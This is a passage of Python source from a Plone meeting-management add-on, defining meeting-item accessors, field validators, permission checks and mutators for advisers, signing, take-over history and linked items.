This way, we can display\n more information than just the title.'''\n if withTypeName:\n return \"{0} - {1}\".format(translate(self.portal_type,\n domain=\"plone\",\n context=self.REQUEST).encode('utf-8'),\n self.Title(withMeetingDate=True))\n return self.Title(withMeetingDate=True)\n\n def Title(self, withMeetingDate=False, **kwargs):\n title = self.getField('title').get(self, **kwargs)\n if withMeetingDate:\n meeting = self.getMeeting()\n # XXX check on datetime to be removed after Meeting migration to DX\n if meeting and isinstance(meeting.date, datetime):\n tool = api.portal.get_tool('portal_plonemeeting')\n return \"{0} ({1})\".format(\n title, tool.format_date(meeting.date, with_hour=True).encode('utf-8'))\n return title\n\n security.declarePublic('getPrettyLink')\n\n def getPrettyLink(self, **kwargs):\n \"\"\"Return the IPrettyLink version of the title.\"\"\"\n adapted = IPrettyLink(self)\n adapted.target = '_parent'\n adapted.showContentIcon = kwargs.get('showContentIcon', True)\n for k, v in kwargs.items():\n setattr(adapted, k, v)\n if not self.adapted().isPrivacyViewable():\n adapted.isViewable = False\n return adapted.getLink()\n\n def _mayNotViewDecisionMsg(self):\n \"\"\"Return a message specifying that current user may not view decision.\n Decision is hidden when using 'hide_decisions_when_under_writing' WFAdaptation\n when meeting is 'decided' and user may not edit the item.\"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n adaptations = cfg.getWorkflowAdaptations()\n # manage case of accepted item that is no longer editable by MeetingManagers\n # but the meeting in this case is still editable\n meeting = self.getMeeting()\n if meeting and 'hide_decisions_when_under_writing' in adaptations and \\\n meeting.query_state() == 'decided' and \\\n not (_checkPermission(ModifyPortalContent, self) or\n _checkPermission(ModifyPortalContent, meeting)):\n # do not return unicode as getDecision usually returns 'utf-8'\n return translate('decision_under_edit',\n domain='PloneMeeting',\n context=self.REQUEST,\n default=HIDE_DECISION_UNDER_WRITING_MSG).encode('utf-8')\n\n security.declarePublic('getMotivation')\n\n def getMotivation(self, **kwargs):\n '''Override 'motivation' field accessor. 
It manages\n the 'hide_decisions_when_under_writing' workflowAdaptation that\n hides the motivation/decision for non-managers if meeting state is 'decided'.'''\n # hide the decision?\n msg = self._mayNotViewDecisionMsg()\n return msg or self.getField('motivation').get(self, **kwargs)\n\n security.declarePublic('getRawMotivation')\n\n def getRawMotivation(self, **kwargs):\n '''See self.getMotivation docstring.'''\n # hide the decision?\n msg = self._mayNotViewDecisionMsg()\n return msg or self.getField('motivation').getRaw(self, **kwargs)\n\n security.declarePublic('getDecision')\n\n def getDecision(self, **kwargs):\n '''Override 'decision' field accessor.\n Manage the 'hide_decisions_when_under_writing' workflowAdaptation that\n hides the decision for non-managers if meeting state is 'decided'.'''\n # hide the decision?\n msg = self._mayNotViewDecisionMsg()\n return msg or self.getField('decision').get(self, **kwargs)\n\n security.declarePublic('getRawDecision')\n\n def getRawDecision(self, **kwargs):\n '''See self.getDecision docstring.'''\n # hide the decision?\n msg = self._mayNotViewDecisionMsg()\n return msg or self.getField('decision').getRaw(self, **kwargs)\n\n def _get_votes_result_cachekey(method, self, check_is_html=True):\n '''cachekey method for self._get_votes_result.'''\n return repr(self), self.modified(), check_is_html\n\n @ram.cache(_get_votes_result_cachekey)\n def _get_votes_result(self, check_is_html=True):\n \"\"\"Compute votesResult using MeetingConfig.votesResultTALExpr.\n When p_check_is_html=True result is checked and if it is not HTML\n a portal_message is displayed to the user.\"\"\"\n extra_expr_ctx = _base_extra_expr_ctx(self)\n # quick bypass when not used or if item not in a meeting\n expr = extra_expr_ctx['cfg'].getVotesResultTALExpr().strip()\n if not expr or not self.hasMeeting():\n return ''\n\n extra_expr_ctx.update({'item': self, 'meeting': self.getMeeting()})\n # default raise_on_error=False so if the expression\n # raises an error, we will get '' as result and a message in the log\n res = _evaluateExpression(self,\n expression=expr,\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx,\n empty_expr_is_true=False)\n # make sure we do not have None\n res = res or ''\n # make sure result is HTML\n if res and check_is_html and not is_html(res):\n api.portal.show_message(\n _('votes_result_not_html'), request=self.REQUEST, type='warning')\n res = ''\n return safe_encode(res)\n\n security.declarePublic('getVotesResult')\n\n def getVotesResult(self, real=False, **kwargs):\n '''Override 'votesResult' field accessor.\n If empty we will return the evaluated MeetingConfig.votesResultExpr.'''\n res = self.getField('votesResult').get(self, **kwargs)\n if not real and not res:\n res = self._get_votes_result(**kwargs)\n return res\n\n security.declarePublic('getRawVotesResult')\n\n def getRawVotesResult(self, real=False, **kwargs):\n '''See getVotesResult docstring.'''\n res = self.getField('votesResult').getRaw(self, **kwargs)\n if not real and not res:\n res = self._get_votes_result(**kwargs)\n return res\n\n security.declarePrivate('validate_category')\n\n def validate_category(self, value):\n '''Checks that, if we use categories, a category is specified.\n The category will not be validated when editing an item template.'''\n\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # check if value is among 
categories defined in the MeetingConfig\n if self.attribute_is_used('category') and \\\n value not in cfg.categories.objectIds():\n return translate('category_required', domain='PloneMeeting', context=self.REQUEST)\n\n security.declarePrivate('validate_committees')\n\n def validate_committees(self, values):\n '''Checks that NO_COMMITTEE is the only value when it is selected.'''\n # remove empty strings and Nones\n values = [v for v in values if v]\n if NO_COMMITTEE in values and len(values) > 1:\n return translate('can_not_select_no_committee_and_committee',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n security.declarePrivate('validate_classifier')\n\n def validate_classifier(self, value):\n '''Checks that, if we use classifiers, a classifier is specified.\n The classifier will not be validated when editing an item template.'''\n\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # check if value is among classifiers defined in the MeetingConfig\n if (self.attribute_is_used('classifier')) and value not in cfg.classifiers.objectIds():\n return translate('classifier_required', domain='PloneMeeting', context=self.REQUEST)\n\n security.declarePrivate('validate_groupsInCharge')\n\n def validate_groupsInCharge(self, value):\n '''Checks that, if we use the \"groupsInCharge\", a group in charge is specified,\n except when editing an item template.'''\n\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n # remove empty strings and Nones\n value = [v for v in value if v]\n\n # check if field is enabled in the MeetingConfig\n if self.attribute_is_used('groupsInCharge') and not value:\n return translate('groupsInCharge_required', domain='PloneMeeting', context=self.REQUEST)\n\n security.declarePrivate('validate_itemAssembly')\n\n def validate_itemAssembly(self, value):\n '''Validate the itemAssembly field.'''\n if not validate_item_assembly_value(value):\n return translate('Please check that opening \"[[\" have corresponding closing \"]]\".',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n security.declarePrivate('validate_pollType')\n\n def validate_pollType(self, value):\n '''Validate the pollType field.'''\n old_pollType = self.getPollType()\n if old_pollType != value:\n view = self.restrictedTraverse(\"@@change-item-polltype\")\n # validate_new_poll_type returns None if validation passed,\n # an error message otherwise\n return view.validate_new_poll_type(old_pollType, value)\n\n security.declarePrivate('validate_proposingGroup')\n\n def validate_proposingGroup(self, value):\n '''proposingGroup is mandatory if used, except for an itemtemplate.'''\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n if not value and not self.attribute_is_used('proposingGroupWithGroupInCharge'):\n return translate('proposing_group_required',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # when created through plonemeeting.restapi for example, make sure\n # current user is a member of the proposingGroup\n\n if value and \\\n self.checkCreationFlag():\n tool = api.portal.get_tool('portal_plonemeeting')\n if value not in tool.get_orgs_for_user(\n only_selected=False, suffixes=[\"creators\"]):\n if not tool.isManager(realManagers=True):\n return translate(\n 'proposing_group_not_available',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n security.declarePrivate('validate_proposingGroupWithGroupInCharge')\n\n def 
validate_proposingGroupWithGroupInCharge(self, value):\n '''proposingGroupWithGroupInCharge is mandatory if used, except for an itemtemplate.'''\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n # make sure we have a proposingGroup and a groupInCharge in case configuration is not correct\n # we would have \"Proposing group ()\"\n if self.attribute_is_used('proposingGroupWithGroupInCharge'):\n proposingGroupUid = groupInChargeUid = ''\n if value:\n proposingGroupUid, groupInChargeUid = value.split('__groupincharge__')\n if not proposingGroupUid or not groupInChargeUid:\n return translate('proposing_group_with_group_in_charge_required',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n security.declarePrivate('validate_optionalAdvisers')\n\n def validate_optionalAdvisers(self, values):\n '''When selecting an optional adviser, make sure that 2 values regarding the same\n group are not selected; this could be the case when using delay-aware advisers.\n Moreover, make sure we can not unselect an adviser that already gave his advice.'''\n # remove empty strings and Nones\n values = [v for v in values if v]\n\n # check that advice was not asked twice for same adviser\n # it can be a delay-aware advice and a simple advice\n # or 2 delay-aware advices for same group\n real_adviser_values = []\n adviser_userid_values = []\n adviser_rowid_userid_values = []\n real_adviser_userid_values = []\n for adviser in values:\n if '__userid__' not in adviser:\n if '__rowid__' in adviser:\n real_adviser_values.append(decodeDelayAwareId(adviser)[0])\n else:\n real_adviser_values.append(adviser)\n else:\n # '__userid__'\n if '__rowid__' in adviser:\n adviser_rowid_userid_values.append(decodeDelayAwareId(adviser)[0])\n real_adviser_userid_values.append(decodeDelayAwareId(adviser)[0])\n else:\n adviser_userid_values.append(adviser.split('__userid__')[0])\n real_adviser_userid_values.append(adviser.split('__userid__')[0])\n\n if len(set(real_adviser_values)) != len(real_adviser_values):\n return translate('can_not_select_several_optional_advisers_same_group',\n domain='PloneMeeting',\n context=self.REQUEST)\n # a value in real_adviser_values may not be in real_adviser_userid_values\n # that would mean for example a delay-aware adviser selected\n # and a userid for same not delay-aware advice\n # or more commonly, an adviser group and some userids of the same group\n # we must either select group or user\n if set(real_adviser_values).intersection(real_adviser_userid_values):\n return translate('can_not_select_advisers_group_and_userids',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # check also that a userid is not selected for a rowid advice\n # and another userid for the corresponding non rowid advice\n if set(adviser_rowid_userid_values).intersection(adviser_userid_values):\n return translate('can_not_select_userids_for_same_advice_of_different_type',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # when advices are inherited, we can not ask another one for same adviser\n for adviser in values:\n rowid = ''\n if '__rowid__' in adviser:\n adviser_real_uid, rowid = decodeDelayAwareId(adviser)\n elif '__userid__' in adviser:\n adviser_real_uid, userid = adviser.split('__userid__')\n else:\n adviser_real_uid = adviser\n if adviser_real_uid in getattr(self, 'adviceIndex', {}) and \\\n self.adviceIndex[adviser_real_uid]['inherited']:\n # use getAdviceDataFor because we do not have all the correct values\n # stored for an inherited advice, especially 'not_asked'\n 
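# for reference, the adviser tokens handled above look like 'org_uid',\n # 'org_uid__rowid__row_id' (delay-aware) or 'org_uid__userid__user_id'\n # (advice asked to a single user), as suggested by the split() and\n # decodeDelayAwareId() calls\n 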
adviceInfo = self.getAdviceDataFor(self, adviser_real_uid)\n if rowid != adviceInfo['row_id'] or adviceInfo['not_asked']:\n return translate('can_not_select_optional_adviser_same_group_as_inherited',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # find unselected advices and check if it was not already given\n storedOptionalAdvisers = self.getOptionalAdvisers()\n removedAdvisers = set(storedOptionalAdvisers).difference(set(values))\n if removedAdvisers:\n givenAdvices = self.getGivenAdvices()\n for removedAdviser in removedAdvisers:\n orig_removedAdviser = removedAdviser\n if '__rowid__' in removedAdviser:\n removedAdviser, rowid = decodeDelayAwareId(removedAdviser)\n elif '__userid__' in removedAdviser:\n removedAdviser, userid = removedAdviser.split('__userid__')\n if removedAdviser in givenAdvices and \\\n givenAdvices[removedAdviser]['optional'] is True:\n vocab = get_vocab(self, self.getField('optionalAdvisers').vocabulary_factory)\n # use term.sortable_title that contains the adviser title\n # when removing an advice asked to a userid\n return translate(\n 'can_not_unselect_already_given_advice',\n mapping={\n 'removedAdviser':\n vocab.getTermByToken(orig_removedAdviser).sortable_title},\n domain='PloneMeeting',\n context=self.REQUEST)\n return self.adapted().custom_validate_optionalAdvisers(\n values, storedOptionalAdvisers, removedAdvisers)\n\n def custom_validate_optionalAdvisers(self, value, storedOptionalAdvisers, removedAdvisers):\n '''See doc in interfaces.py.'''\n pass\n\n security.declarePublic('manuallyLinkedItemsBaseQuery')\n\n def manuallyLinkedItemsBaseQuery(self):\n '''base_query for the 'manuallyLinkedItems' field.\n Here, we restrict the widget to search only MeetingItems.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n allowed_types = []\n for cfg in tool.getActiveConfigs():\n allowed_types.append(cfg.getItemTypeName())\n query = {}\n query['portal_type'] = allowed_types\n query['sort_on'] = \"modified\"\n query['sort_order'] = \"reverse\"\n return query\n\n security.declarePublic('getDefaultBudgetInfo')\n\n def getDefaultBudgetInfo(self):\n '''The default budget info is to be found in the config.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return cfg.getBudgetDefault()\n\n security.declarePublic('showObservations')\n\n def showObservations(self):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n return item.attribute_is_used('observations')\n\n security.declarePublic('show_budget_infos')\n\n def show_budget_infos(self):\n '''Condition for showing budgetRelated/budgetInfos fields.'''\n # using field, viewable/editable\n if self.attribute_is_used(\"budgetInfos\") and \\\n api.user.get_current().has_permission('PloneMeeting: Read budget infos', self):\n return True\n\n security.declarePublic('show_groups_in_charge')\n\n def show_groups_in_charge(self):\n '''When field 'groupsInCharge' is used, it is editable.\n When using MeetingConfig.includeGroupsInChargeDefinedOnProposingGroup\n or MeetingConfig.includeGroupsInChargeDefinedOnCategory\n then it is editable by MeetingManagers.'''\n # using field, viewable/editable\n if self.attribute_is_used(\"groupsInCharge\"):\n return True\n\n res = False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n _is_editing = is_editing(cfg)\n raw_groups_in_charge = self.getRawGroupsInCharge()\n # viewable if not empty\n if not _is_editing and raw_groups_in_charge:\n res = True\n # editable when not empty and user is 
a MeetingManager\n # this may result from various functionalities like \"MeetingConfig.include...\"\n # except when using \"proposingGroupWithGroupInCharge\"\n elif not self.attribute_is_used(\"proposingGroupWithGroupInCharge\") and \\\n _is_editing and \\\n raw_groups_in_charge and \\\n tool.isManager(cfg):\n res = True\n return res\n\n security.declarePublic('show_committees')\n\n def show_committees(self):\n '''When field 'committees' is used, show it to editors if\n not using \"auto_from\" or if user is a MeetingManager.'''\n res = False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n raw_committees = getattr(self, 'committees', ())\n # take care that committees is activated in MeetingConfig.usedMeetingAttributes\n if \"committees\" in cfg.getUsedMeetingAttributes() or raw_committees:\n res = True\n if is_editing(cfg):\n # when using \"auto_from\" in MeetingConfig.committees,\n # the field is only shown to MeetingManagers\n if cfg.is_committees_using(\"auto_from\") and not tool.isManager(cfg):\n res = False\n return res\n\n security.declarePublic('show_votesObservations')\n\n def show_votesObservations(self):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n res = False\n if item.attribute_is_used(\"votesObservations\") or \\\n item.getRawVotesObservations():\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n res = tool.isManager(cfg)\n if not res:\n res = tool.isPowerObserverForCfg(cfg) or item.is_decided(cfg)\n return res\n\n security.declarePublic('showIsAcceptableOutOfMeeting')\n\n def showIsAcceptableOutOfMeeting(self):\n '''Show the MeetingItem.isAcceptableOutOfMeeting field if WFAdaptation\n 'accepted_out_of_meeting' or 'accepted_out_of_meeting_and_duplicated'\n is used.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n wfAdaptations = cfg.getWorkflowAdaptations()\n return 'accepted_out_of_meeting' in wfAdaptations or \\\n 'accepted_out_of_meeting_and_duplicated' in wfAdaptations\n\n security.declarePublic('showEmergency')\n\n def showEmergency(self):\n '''Show the MeetingItem.emergency field if :\n - in usedItemAttributes;\n - or if WFAdaptation 'accepted_out_of_meeting_emergency' or\n 'accepted_out_of_meeting_emergency_and_duplicated' is enabled;\n - and hide it if isDefinedInTool.'''\n res = False\n if self.attribute_is_used('emergency'):\n res = True\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n wfAdaptations = cfg.getWorkflowAdaptations()\n res = ('accepted_out_of_meeting_emergency' in wfAdaptations or\n 'accepted_out_of_meeting_emergency_and_duplicated' in wfAdaptations) and \\\n not self.isDefinedInTool()\n return res\n\n security.declarePublic('showMeetingManagerReservedField')\n\n def showMeetingManagerReservedField(self, name):\n '''When must the field named p_name be shown?'''\n # show field if it is a recurring item or an item template\n # especially done so item template managers may manage it\n if self.isDefinedInTool() and \\\n self.attribute_is_used(name) and \\\n _checkPermission(WriteItemMeetingManagerFields, self):\n return True\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return cfg.show_meeting_manager_reserved_field(name, meta_type='MeetingItem')\n\n security.declarePublic('showOralQuestion')\n\n def showOralQuestion(self):\n '''On edit, show if the field is enabled and if current user isManager.'''\n res = False\n if 
self.attribute_is_used('oralQuestion'):\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = tool.isManager(cfg)\n return res\n\n security.declarePublic('showToDiscuss')\n\n def showToDiscuss(self):\n '''On edit or view page for an item, we must show field 'toDiscuss' if :\n - field is used and :\n - MeetingConfig.toDiscussSetOnItemInsert is False or;\n - MeetingConfig.toDiscussSetOnItemInsert is True and item is linked\n to a meeting.'''\n res = False\n if self.attribute_is_used('toDiscuss'):\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = (not cfg.getToDiscussSetOnItemInsert() or\n (not self.isDefinedInTool() and\n cfg.getToDiscussSetOnItemInsert() and\n self.hasMeeting()))\n return res\n\n security.declarePublic('showItemIsSigned')\n\n def showItemIsSigned(self):\n '''Condition for showing the 'itemIsSigned' field on views.\n The attribute must be used and the item must be decided.'''\n return self.attribute_is_used('itemIsSigned') and \\\n (self.hasMeeting() or self.query_state() == 'validated')\n\n security.declarePublic('mayChangeListType')\n\n def mayChangeListType(self):\n '''Condition for editing 'listType' field.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if item.hasMeeting() and tool.isManager(cfg):\n return True\n return False\n\n security.declarePublic('mayChangePollType')\n\n def mayChangePollType(self):\n '''Condition for editing 'pollType' field.'''\n item = self.getSelf()\n res = False\n if _checkPermission(ModifyPortalContent, item):\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if not item.hasMeeting() or tool.isManager(cfg):\n res = True\n return res\n\n security.declarePublic('maySignItem')\n\n def maySignItem(self):\n '''Condition for editing 'itemIsSigned' field.\n As the item signature comes after the item is decided/closed,\n we use an unrestricted call in @@toggle_item_is_signed that is protected by\n this method.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n\n # bypass for the Manager role\n if tool.isManager(realManagers=True):\n return True\n\n # Only MeetingManagers can sign an item if it is decided\n if not item.showItemIsSigned() or \\\n not tool.isManager(cfg):\n return False\n\n # If the meeting is in a closed state, the item can only be signed but\n # not \"unsigned\". 
This way, a final state 'signed' exists for the item\n meeting = item.getMeeting()\n if meeting and \\\n meeting.query_state() in Meeting.MEETINGCLOSEDSTATES and \\\n item.getItemIsSigned():\n return False\n return True\n\n security.declarePublic('mayTakeOver')\n\n def mayTakeOver(self):\n '''Check doc in interfaces.py.'''\n wfTool = api.portal.get_tool('portal_workflow')\n item = self.getSelf()\n res = False\n # user has WF transitions to trigger\n if wfTool.getTransitionsFor(item):\n res = True\n else:\n # item is decided and user is member of the proposingGroup\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n item_state = item.query_state()\n if self.is_decided(cfg, item_state) and \\\n item.adapted()._getGroupManagingItem(item_state, theObject=False) in \\\n tool.get_orgs_for_user():\n res = True\n return res\n\n security.declareProtected(ModifyPortalContent, 'setTakenOverBy')\n\n def setTakenOverBy(self, value, **kwargs):\n '''Override MeetingItem.takenOverBy mutator so we can manage\n history stored in 'takenOverByInfos'.\n We can receive a 'wf_state' in the kwargs; it needs to have a format like:\n config_workflowname__wfstate__wfstatename.'''\n # Add a place to store takenOverBy by review_state user id\n # as we override mutator, this method is called before ObjectInitializedEvent\n # do not manage history while creating a new item\n if not self._at_creation_flag:\n # save takenOverBy to takenOverByInfos for current review_state\n # or check for a wf_state in kwargs\n if 'wf_state' in kwargs:\n wf_state = kwargs['wf_state']\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n wf_state = \"%s__wfstate__%s\" % (cfg.getItemWorkflow(), self.query_state())\n if value:\n self.takenOverByInfos[wf_state] = value\n elif not value and wf_state in self.takenOverByInfos:\n del self.takenOverByInfos[wf_state]\n self.getField('takenOverBy').set(self, value, **kwargs)\n\n security.declarePublic('setHistorizedTakenOverBy')\n\n def setHistorizedTakenOverBy(self, wf_state):\n '''Check doc in interfaces.py.'''\n item = self.getSelf()\n\n if wf_state in item.takenOverByInfos:\n previousUserId = item.takenOverByInfos[wf_state]\n previousUser = api.user.get(previousUserId)\n mayTakeOver = False\n if previousUser:\n # do this as previousUser\n # remove AUTHENTICATED_USER during adopt_user to avoid\n # breaking utils.get_current_user_id\n auth_user = item.REQUEST.get(\"AUTHENTICATED_USER\")\n if auth_user:\n item.REQUEST[\"AUTHENTICATED_USER\"] = None\n with api.env.adopt_user(user=previousUser):\n try:\n mayTakeOver = item.adapted().mayTakeOver()\n except Exception:\n logger.warning(\n \"An error occurred in 'setHistorizedTakenOverBy' \"\n \"while evaluating 'mayTakeOver'\")\n if auth_user:\n item.REQUEST[\"AUTHENTICATED_USER\"] = auth_user\n if not mayTakeOver:\n item.setTakenOverBy('')\n else:\n item.setTakenOverBy(previousUserId)\n else:\n item.setTakenOverBy('')\n\n security.declarePublic('mayTransfer')\n\n def mayTransfer(self):\n '''Check doc in interfaces.py.'''\n item = self.getSelf()\n res = False\n if item.getOtherMeetingConfigsClonableTo():\n tool = api.portal.get_tool('portal_plonemeeting')\n res = tool.isManager(tool.getMeetingConfig(item))\n return res\n\n security.declarePublic('mayAskEmergency')\n\n def mayAskEmergency(self):\n '''Check doc in interfaces.py.'''\n # by default, everybody able to edit the item can ask emergency\n item = self.getSelf()\n if item.isDefinedInTool():\n return False\n\n if 
_checkPermission(ModifyPortalContent, item):\n return True\n\n security.declarePublic('mayAcceptOrRefuseEmergency')\n\n def mayAcceptOrRefuseEmergency(self):\n '''Check doc in interfaces.py.'''\n # by default, only MeetingManagers can accept or refuse emergency\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if tool.isManager(cfg) and _checkPermission(ModifyPortalContent, item):\n return True\n return False\n\n security.declarePublic('mayEvaluateCompleteness')\n\n def mayEvaluateCompleteness(self):\n '''Check doc in interfaces.py.'''\n # user must be able to edit current item\n item = self.getSelf()\n if item.isDefinedInTool():\n return False\n\n res = False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n # user must be an item completeness editor (one of corresponding role)\n if _checkPermission(ModifyPortalContent, item) and \\\n (tool.userIsAmong(ITEM_COMPLETENESS_EVALUATORS) or tool.isManager(cfg)):\n res = True\n return res\n\n security.declarePublic('mayAskCompletenessEvalAgain')\n\n def mayAskCompletenessEvalAgain(self):\n '''Check doc in interfaces.py.'''\n # user must be able to edit current item\n item = self.getSelf()\n if item.isDefinedInTool():\n return\n\n res = False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n # user must be an item completeness editor (one of corresponding role)\n if item.getCompleteness() == 'completeness_incomplete' and \\\n _checkPermission(ModifyPortalContent, item) and \\\n (tool.userIsAmong(ITEM_COMPLETENESS_ASKERS) or tool.isManager(cfg)):\n res = True\n return res\n\n def _is_complete(self):\n '''Check doc in interfaces.py.'''\n item = self.getSelf()\n return item.getCompleteness() in ('completeness_complete',\n 'completeness_evaluation_not_required')\n\n security.declarePublic('mayEditAdviceConfidentiality')\n\n def mayEditAdviceConfidentiality(self, org_uid):\n '''Check doc in interfaces.py.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n # user must be able to edit the item and must be a Manager\n if item.adviceIsInherited(org_uid) or \\\n not _checkPermission(ModifyPortalContent, item) or \\\n not tool.isManager(cfg):\n return False\n return True\n\n def adviceIsInherited(self, org_uid):\n \"\"\" \"\"\"\n res = False\n if self.adviceIndex.get(org_uid) and \\\n self.adviceIndex[org_uid]['inherited']:\n res = True\n return res\n\n security.declarePublic('mayAskAdviceAgain')\n\n def mayAskAdviceAgain(self, advice):\n '''Returns True if current user may ask given p_advice advice again.\n For this :\n - advice must not be 'asked_again', inherited or not_asked (initiative);\n - item is editable by current user (Manager and MeetingManager) or\n using WFA \"waiting_advices_proposing_group_send_back\" and current\n user is member of the proposingGroup able to send item back in WF.'''\n\n item = self.getSelf()\n adviser_uid = advice.advice_group\n\n if advice.advice_type == 'asked_again' or \\\n item.adviceIsInherited(adviser_uid) or \\\n item.adviceIndex[adviser_uid][\"not_asked\"]:\n return False\n\n # (Meeting)Managers\n if _checkPermission(ModifyPortalContent, item):\n return True\n # _waiting_advices\n item_state = item.query_state()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if item_state.endswith(\"_waiting_advices\") and \\\n \"waiting_advices_proposing_group_send_back\" in 
cfg.getWorkflowAdaptations() and \\\n item.adviceIndex[adviser_uid][\"advice_editable\"]:\n # check that current user is member of the proposingGroup suffix\n # to which the item state could go back\n org_uid = self._getGroupManagingItem(item_state)\n # get the \"back\" states, item_state is like \"proposed_waiting_advices\"\n # or \"itemcreated__or__proposed_waiting_advices\"\n # or when using WAITING_ADVICES_FROM_STATES 'new_state_id',\n # we use the \"from_states\"\n states = item_state.replace(\"_waiting_advices\", \"\")\n if \"__or__\" in states:\n states = states.split(\"__or__\")\n else:\n found = False\n for infos in get_waiting_advices_infos(cfg.getId()):\n if infos['new_state_id'] == states:\n states = infos['from_states']\n found = True\n break\n if not found:\n # make sure we have a list\n states = [states]\n suffixes = cfg.getItemWFValidationLevels(\n states=states, data='suffix', only_enabled=True, return_state_singleton=False)\n if tool.user_is_in_org(org_uid=org_uid, suffixes=suffixes):\n return True\n return False\n\n security.declarePublic('mayBackToPreviousAdvice')\n\n def mayBackToPreviousAdvice(self, advice):\n '''Returns True if current user may go back to previous given advice.\n It could be the case if someone asked advice again erroneously\n or for any other reason.\n For this :\n - advice must be 'asked_again'...;\n - advice is no longer editable (except for MeetingManagers);\n - item is editable by current user (including MeetingManagers).'''\n\n item = self.getSelf()\n\n if not advice.advice_type == 'asked_again':\n return False\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n\n # apart from MeetingManagers, the advice can not be set back to previous\n # if editable by the adviser\n if item.adviceIndex[advice.advice_group]['advice_editable'] and \\\n not tool.isManager(cfg):\n return False\n\n if _checkPermission(ModifyPortalContent, item):\n return True\n return False\n\n security.declareProtected(ModifyPortalContent, 'setItemIsSigned')\n\n def setItemIsSigned(self, value, **kwargs):\n '''Overrides the field 'itemIsSigned' mutator to check if the field is\n actually editable.'''\n # if we are not in the creation process (setting the default value)\n # and if the user can not sign the item, we raise an Unauthorized\n if not self._at_creation_flag and not self.adapted().maySignItem():\n raise Unauthorized\n self.getField('itemIsSigned').set(self, value, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'setItemNumber')\n\n def setItemNumber(self, value, **kwargs):\n '''Overrides the field 'itemNumber' mutator to\n notifyModified and reindex relevant indexes.'''\n current_item_number = self.getField('itemNumber').get(self, **kwargs)\n if not value == current_item_number:\n self.getField('itemNumber').set(self, value, **kwargs)\n reindex_object(self, idxs=['getItemNumber'], update_metadata=False)\n\n security.declareProtected(ModifyPortalContent, 'setManuallyLinkedItems')\n\n def setManuallyLinkedItems(self, value, caching=True, **kwargs):\n '''Overrides the field 'manuallyLinkedItems' mutator so we synchronize\n the field manuallyLinkedItems of every linked item...\n We use ZCatalog.unrestrictedSearchResults\n because current member could update manually linked items among which some are not viewable.'''\n stored = self.getField('manuallyLinkedItems').getRaw(self, **kwargs)\n # value sometimes contains an empty string ''...\n if value is None:\n value = ()\n if '' in value:\n 
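# remove() implies value is a mutable list at this point (the '' marker\n # comes from the submitted form); the () fallback above never contains ''\n 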
value.remove('')\n\n # save the value that will actually be stored on self, as it will differ from value\n # if some extra uids are appended to it when linking to an item\n # that is already linked to other items\n valueToStore = list(value)\n # only compute if something changed\n if not set(stored) == set(value):\n\n # we use unrestrictedSearchResults so that, when a user updates manually linked items\n # and one of the already selected items is not viewable by him, it is still found in the catalog\n unrestrictedSearch = api.portal.get_tool('portal_catalog').unrestrictedSearchResults\n item_infos = {}\n\n def _get_item_infos(item_uid):\n \"\"\"Return meeting_date and item_created data for given p_item_uid.\"\"\"\n if not caching or item_uid not in item_infos:\n item = self if item_uid == self.UID() else None\n if item is None:\n brains = unrestrictedSearch(UID=item_uid)\n if brains:\n # there could be no brains when created from restapi call\n # as new item is still not indexed\n item = brains[0]._unrestrictedGetObject()\n if item:\n meeting = item.getMeeting()\n item_infos[item_uid] = {\n 'item': item,\n 'meeting_date': meeting and meeting.date or None,\n 'item_created': item.created()}\n else:\n 